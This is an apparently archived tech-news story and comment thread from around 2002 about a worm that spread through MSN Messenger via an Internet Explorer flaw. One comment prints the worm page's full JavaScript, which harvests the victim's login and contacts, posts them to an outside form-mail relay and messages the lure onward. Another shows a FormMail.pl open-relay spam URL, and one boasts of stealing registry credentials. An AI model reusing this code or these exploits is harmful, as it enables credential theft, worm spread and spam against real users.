Microsoft Instant Messenger Virus Sweeps Net

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

Well, that's one less effectual site for vectoring

[Second_Derivative]

If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.

Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

ToO mAnY cApS!!!11

iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

Other clients?

[Geeyzus]

I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

Mark

Re:Other clients?

[Static_Neurotoxin]

Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

The Code

[nihilist_1137]

Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center">&nbsp;
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>

could be a lot worse, likely will be soon

[immanis]

I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

It worked too. Got to log into MSN as the CTO of our company, just to make a point.

As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

Not a Messenger flaw

[Osty]

First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.

Install the patch and be done with it.

Re:Not a Messenger flaw

[RWarrior(fobw)]

"Install the patch and be done with it."

Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

interesting article on the reg

[rogueuk]

the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P

Re:interesting article on the reg

[sam_handelman]

"this bug should not have been there" rants don't count as a solution

You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.

In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.

If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issueing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.

Thus, I've proven that the free market will take care of MS on it's own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.

I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
"By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."

Kinda funny..

[jfroot]

I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

Warhol? worm

[blkros]

The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.

Finally!

[digitalcowboy]

I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

Re:No DNS Record? (Geeky Observations)

[bovinewasteproduct]

You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Looks fine to me..:)

BWP

One shoe drops

Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...

The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.

Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.

Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

Re:One shoe drops

[rjamestaylor]

• Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.

formmail.pl

[TheFlu]

Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

Formmail.pl Can Be Used As An Open Mail Relay

Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.

Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).

Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to% 20send%20anonymous%20spam.

Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.

Sends mail too .. email address harvesting?

[Wizard+of+OS]

Look closely:

<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

I think somebody forgot that HTML source can be viewed ...

The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.

Erlang Virus Propagation System

"A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."

Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.

An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.

As I recall, there was a story on /. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.

Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!

NOT a "Warhol Worm", just topologically aware

[nweaver]

Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.

People clicking on links...

[Macrobat]

True story:

I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."

When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

Didn't know what to say to that.

Re:People clicking on links...

[roystgnr]

Didn't know what to say to that.

Well, duh. Two words:

"Prove it!"

Re:Gee...

[Frater+219]

According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

Re:Know how to stop IE from launching MSN Msgr?

[mech9t8]

You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

Remove the following registry keys:

HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441 -0 0C04F795683}
HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94 -0 000F875C541}
HKEY_CLASSES_ROOT\Messenger.MsgrObject

and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

You'll need to remove them again if you upgrade or reinstall - it'll put the references back.

Duhhhh... Why not...

[Shuh]

Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

Re:CAPITALS ARE GOOD

[amanb]

> I hate my COBOL! course

Is that the Yahoo! version of COBOL?